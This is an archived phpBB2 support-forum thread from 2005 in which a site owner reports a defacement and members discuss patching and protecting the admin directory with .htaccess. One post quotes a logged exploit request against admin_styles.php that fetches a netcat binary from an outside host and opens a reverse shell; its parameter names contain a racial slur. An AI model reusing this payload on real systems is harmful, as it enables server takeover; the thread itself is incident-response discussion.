2.0.13 hacked - lots of abdi_api defacement on 4/3/05

This is an archive of the phpBB 2.0.x support forum. Support for phpBB2 has now ended.
scumola
Registered User
Posts: 12
Joined: Wed Apr 06, 2005 4:49 pm

2.0.13 hacked - lots of abdi_api defacement on 4/3/05

Post by scumola »

My site was hacked and defaced with lots of Abdi_api messages. Google search finds others with this same defacement - they re-named the forums and "cleaned" lots of messages from the forum - since I have no backup, they're lost for good.

http://www.google.com/search?hl=en&q=Ab ... gle+Search

Need someone to make a patch for this hack asap please!

- Steve
scumola
Registered User
Posts: 12
Joined: Wed Apr 06, 2005 4:49 pm

Yes, it was 2.0.13

Post by scumola »

I'm not releasing the name/ip of my site (so he/she doesn't come and re-compromise it), but it WAS 2.0.13. I can send apache logs if a developer is interested in the POST commands that were used to get in.

- Steve
scumola
Registered User
Posts: 12
Joined: Wed Apr 06, 2005 4:49 pm

More analysis

Post by scumola »

So, the first few pages that were accessed by the hacker/defacer were a backup of the database (my admin/ dir had no .htaccess in it, and was apparently compromisable). From there, I'm guessing that since he/she had the backup of the whole thing, he/she could do whatever he/she wanted to do.

Perhaps the phpBB install/upgrade should make sure that there is a .htaccess file in the admin dir? Just an idea.

- Steve
chrisjlocke
Registered User
Posts: 532
Joined: Fri Sep 24, 2004 3:45 pm
Location: Essex, UK

Post by chrisjlocke »

What should be in this .htaccess file, and exactly which directory should it go?
I've just had someone forward their logs to me after they were hacked (same thing as you - backup first) so wondered what the 'prevention' was...
scumola
Registered User
Posts: 12
Joined: Wed Apr 06, 2005 4:49 pm

... also ...

Post by scumola »

... and an attempt at cracking the actual machine:

GET /phpBB2/admin/admin_styles.php?mode=addnew&install_to=
../../../../../../../../../../../../../../../../../../../tmp&sid=
65411e085893e1cf1c9d8b8b2a6f5b1d&niggaip=63.228.89.225&
niggaport=8888&nigga=$a=fopen(\"http://overdose.tcpteam.org/
background/nc.elf\",\"r\");$b=\"\";while(!feof($a)){$b%20.=%20fread
($a,200000);};fclose($a);$a=fopen(\"/tmp/.sesss_\",\"w\");fwrite($a,$b);
fclose($a);chmod(\"/tmp/.sesss_\",0777);system(\"/tmp/.sesss_%20\".
$_REQUEST[niggaip].\"%20\".$_REQUEST[niggaport].\"%20-e%20/bin/sh\"); HTTP/1.1
Last edited by scumola on Wed Apr 06, 2005 7:58 pm, edited 1 time in total.
scumola
Registered User
Posts: 12
Joined: Wed Apr 06, 2005 4:49 pm

The .htaccess file ...

Post by scumola »

The .htaccess file in the admin dir is just there to have the web server query the user for a user id & password. It's difficult for "scripts" to get past this type of authentication.

Here are some links to the .htaccess file info so you can make your own:

http://httpd.apache.org/docs/howto/htaccess.html
http://www.javascriptkit.com/howto/htaccess.shtml
http://apache-server.com/tutorials/ATus ... ccess.html

Create a .htaccess and .htpasswd file - put the .htaccess file in the admin/ dir and the first time you go to the /admin/ dir in your browser (the browser will remember until you kill your browser session) you'll be prompted for a user id & password (that you create).

- Steve
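As an added example (not part of Steve's post and not a file shipped with phpBB), here is the kind of .htaccess that does what he describes: Apache asks for a user name and password before it serves anything under admin/, so a script that simply requests admin/admin_db_utilities.php or any other admin page gets a 401 instead of the page. The AuthUserFile path is a placeholder; the password file is created separately with the htpasswd tool and belongs outside the document root so that it can never be downloaded over HTTP.

```apache
# admin/.htaccess -- added example, not from the original post or from phpBB.
# Apache only honours this file if the admin directory (or a parent) has
# "AllowOverride AuthConfig" (or "AllowOverride All") in httpd.conf; with
# "AllowOverride None" the file is silently ignored and the directory stays open,
# so test with a browser or curl after installing it.
AuthType Basic
AuthName "phpBB administration"
# Placeholder path: keep the password file OUTSIDE the web root so it is never
# reachable as a URL. Create it once with:  htpasswd -c /path/outside/docroot/.htpasswd admin
# (drop -c when adding further users, or it recreates the file).
AuthUserFile /path/outside/docroot/.htpasswd
Require valid-user
```

To check that it is active, request /admin/ without credentials (for example `curl -I http://yourforum/phpBB2/admin/`) and confirm the response is `401 Authorization Required`; a 200 means AllowOverride is not permitting the file. Basic authentication sends the password base64-encoded rather than encrypted, so this protects the admin pages against the automated scripts described in the thread, but the credentials themselves are only private if the admin area is served over HTTPS.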
geocator
Registered User
Posts: 16242
Joined: Fri Jan 09, 2004 11:56 pm
Location: On dry land

Post by geocator »

That GET string is for an exploit that was patched in 2.0.13. So maybe you did not update. Also you may find out it was not through phpBB that they hacked your site. However I would recommend that you post in the security tracker with all the details you have so the devs can look into it.
chrisjlocke
Registered User
Posts: 532
Joined: Fri Sep 24, 2004 3:45 pm
Location: Essex, UK

Post by chrisjlocke »

Thanks scumola for that - much appreciated.
Your post under mine is very similar to the attack in the logs I was sent.
scumola
Registered User
Posts: 12
Joined: Wed Apr 06, 2005 4:49 pm

2.0.13

Post by scumola »

I checked, and the version is indeed 2.0.13. Perhaps they just tried that string to see if it would work or not. Either way, my site was hacked and I lost LOTS of important info and I'd like to see whatever it was fixed.

Let me know where to post the logs that I have.

- Steve
geocator
Registered User
Posts: 16242
Joined: Fri Jan 09, 2004 11:56 pm
Location: On dry land

Post by geocator »

scumola
Registered User
Posts: 12
Joined: Wed Apr 06, 2005 4:49 pm

Post by scumola »

Check. I submitted my logs. Thanks for the info.

- Steve
The Techboy
Registered User
Posts: 207
Joined: Tue May 04, 2004 7:37 pm

Re: 2.0.13

Post by The Techboy »

scumola wrote: I checked, and the version is indeed 2.0.13. Perhaps they just tried that string to see if it would work or not. Either way, my site was hacked and I lost LOTS of important info and I'd like to see whatever it was fixed.

Let me know where to post the logs that I have.

- Steve


K, scumola. Let me just clarify what geocator said, in nice big bold letters.
That GET string is for an exploit that was patched in 2.0.13. So you did not patch properly.
scumola
Registered User
Posts: 12
Joined: Wed Apr 06, 2005 4:49 pm

Post by scumola »

Let me just clarify what I said. My site WAS PATCHED. I keep it patched every time there's a phpBB2 update. It's been patched for quite a while. I tried to re-patch today and it wouldn't patch it because it was already patched! Yet, the site was still defaced and "pruned" just two days ago!

It's very possible that they just tried the older exploit to see if it would work, not knowing which version is on my site. I'm not saying that that specific GET did the trick, but it was possible that it was the one. I didn't post all of my logs to this forum, but I did post all of the logs to the security page, so another GET could've done it. I'm just giving you guys the info that I have.

I'm a little upset that my forum was basically erased and your attitude isn't helping very much. Try being a little more constructive next time.
skuipers
Registered User
Posts: 648
Joined: Sun Jan 16, 2005 9:53 pm
Location: Delft, The Netherlands

Post by skuipers »

scumola wrote: I'm a little upset that my forum was basically erased and your attitude isn't helping very much. Try being a little more constructive next time.


Well, you know, you have given no proof that phpBB was the failure in the unfortunate hack of your site.

F.i., it could have been a hack of phpmyadmin. You would be surprised to know how many sites have their phpmyadmin wide open, with the default root user (without a password) being able to access all databases (yes, please, all of you who read this, try it on your own system). It takes an experienced hacker just 10 seconds to compromise your site totally. You would not blame a hack like that on phpBB, would you? In fact, you could not even call this a hack, just extreme carelessness.
scumola
Registered User
Posts: 12
Joined: Wed Apr 06, 2005 4:49 pm

Post by scumola »

I'm pretty sure that I don't have phpmyadmin even installed.

I checked with the security guys and they showed me that my sessions.php file didn't have the "===" change in it (shouldn't the "changed files only" patch have fixed this?).

I'm still getting auto-added users (obviously by people trying to hack the forum). Is there any way to stop these bot-added user-adds?

- Steve